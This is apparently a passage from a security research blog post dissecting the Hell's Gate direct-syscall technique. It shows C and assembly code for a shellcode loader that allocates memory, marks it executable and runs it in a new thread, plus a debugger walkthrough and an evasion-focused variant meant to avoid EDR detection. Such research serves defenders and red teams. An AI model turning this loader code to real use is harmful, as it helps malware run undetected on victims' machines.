SIZE_T sDataSize = sizeof(shellcode);
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
// Write Memory
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
// Change page permissions
ULONG ulOldProtect = 0;
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
// Create thread
HANDLE hHostThread = INVALID_HANDLE_VALUE;
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
// Wait for 1 seconds
LARGE_INTEGER Timeout;
Timeout.QuadPart = -10000000;
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
status = HellDescent(hHostThread, FALSE, &Timeout);
return TRUE;
}
Understanding HellsGate #
We can go ahead and ignore the underlying operations of VxMoveMemory as this is just a custom implementation of memcpy(). However, we can start to understand the underlying operations of the first call, HellsGate.
.data
wSystemCall DWORD 000h
.code
HellsGate PROC
mov wSystemCall, 000h
mov wSystemCall, ecx
ret
HellsGate ENDP
Let’s set a DebugBreak(); just before this call.
DebugBreak();
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
Once run in WinDbg, we see that we’re about to enter the call to HellsGate.
Once in, we can see that the syscall number we dynamically resolved is stored in wSystemCall for later use.
Understanding HellDescent #
At this point our assembly stub holds the syscall number for NtAllocateVirtualMemory within the .data section of the binary. The next step is to call HellDescent, where we actually execute the syscall.
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
When we get to HellDescent we can see that we are moving RCX into R10. Normally, when issuing a function call on x64 Windows, the first four arguments are passed in RCX, RDX, R8, and R9, and any additional arguments go on the stack above the 0x20 bytes of shadow space. The syscall instruction itself overwrites RCX with the return address, so the stub copies the first argument into R10, which is where the kernel expects it. If we look at the function prototype for NtAllocateVirtualMemory() we see six arguments, so the last two (AllocationType and Protect) are passed on the stack.
__kernel_entry NTSYSCALLAPI NTSTATUS NtAllocateVirtualMemory(
[in] HANDLE ProcessHandle,
[in, out] PVOID *BaseAddress,
[in] ULONG_PTR ZeroBits,
[in, out] PSIZE_T RegionSize,
[in] ULONG AllocationType,
[in] ULONG Protect
);
This is further confirmed when dumping the register states.
At this point we can say we have a solid idea on how HellsGate operates :)
- Parse the InMemoryOrderModuleList and obtain the base address of NTDLL
- Obtain the address of the Export Address Table for NTDLL
- Parse the EAT in search for target syscalls
- Execute syscalls
- Profit
PoC | GTFO (Ezekiels Wheel) #
We have learned the inner mechanisms of Hell’s Gate, so now we can use this newfound knowledge to write our own implementation, Ezekiels Wheel. Although it is optimized for evasion, it’s important to know this would not have been possible without understanding the fundamentals of Windows syscalls.
The changes in Ezekiels Wheel are as follows:
- Dynamic syscall search: we do not rely on having hardcoded syscall instructions in our code
- Code re-use: we leverage existing ntdll.dll syscalls so EDRs believe operations to be normal
- We have re-implemented our own hashing technique when searching for function routines
- We gave it a cool name ;)
Ezekiel 10:10 As for their appearance, all four looked alike—as it were, a wheel in the middle of a wheel.
Sources #
http://malwareid.in/unpack/unpacking-basics/export-address-table-and-dll-hijacking
https://doxygen.reactos.org/de/d20/struct__IMAGE__EXPORT__DIRECTORY.html
https://learn.microsoft.com/en-us/windows/win32/api/ntdef/nf-ntdef-containing_record
https://davidesnotes.com/articles/1/?page=1#
https://gist.github.com/Spl3en/9c0ea329bb7878df9b9b
https://redops.at/en/blog/exploring-hells-gate
http://www.rohitab.com/discuss/topic/42191-c-peb-ldr-inmemoryordermodulelist-flink-dllbase-dont-get-the-good-address/
https://www.vergiliusproject.com/
https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/
https://www.youtube.com/watch?v=elA_eiqWefw&t=2s